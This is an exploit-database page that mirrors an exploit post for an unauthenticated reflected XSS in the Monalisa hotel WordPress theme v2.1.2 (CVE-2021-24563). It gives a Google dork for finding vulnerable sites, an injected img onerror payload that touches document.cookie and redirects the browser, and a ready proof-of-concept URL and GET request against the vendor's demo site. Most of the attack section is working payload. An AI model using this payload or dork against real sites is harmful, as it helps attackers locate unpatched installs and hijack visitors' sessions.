Advertisement






Monalisa | Hotel & Resort WordPress Theme v2.1.2 - Unauthenticated Reflected XSS

CVE Category Price Severity
CVE-2021-24563 CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2020-07-13
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020070063

Below is a copy:

Monalisa | Hotel & Resort WordPress Theme v2.1.2 - Unauthenticated Reflected XSS
[+] Exploit Title: Monalisa | Hotel & Resort WordPress Theme v2.1.2 - Unauthenticated Reflected XSS
[+] Google Dork: inurl:/wp-content/themes/monalisa/
[+] Date: 2020-07-02
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: InwaveThemes [ http://inwavethemes.com ]
[+] Software Version: 2.1.2
[+] Software Link: https://themeforest.net/item/monalisa-hotel-resort-management-wordpress-theme/17339084
[+] Tested on: Debian 10
[+] CVE: 
[+] CWE: CWE-79



### [ Info: ]

[i] An Unauthenticated Reflected XSS vulnerability was discovered in the Monalisa theme through 2.1.2 for WordPress.



### [ Payload: ]

[$] 1"--><img src=x onerror=(alert)(document.cookie);window.location=`https://twitter.com/vlad_vector`;>



### [ PoC: ]

[!] http://inwavethemes.com/wordpress/monalisa/reservation/?state=1%22--%3E%3Cimg%20src=x%20onerror=(alert)(document.cookie);window.location=`https://twitter.com/vlad_vector`;%3E

[!] GET /wordpress/monalisa/reservation/?state=1%22--%3E%3Cimg%20src=x%20onerror=(alert)(document.cookie);window.location=`https://twitter.com/vlad_vector`;%3E HTTP/1.1
Host: inwavethemes.com



### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.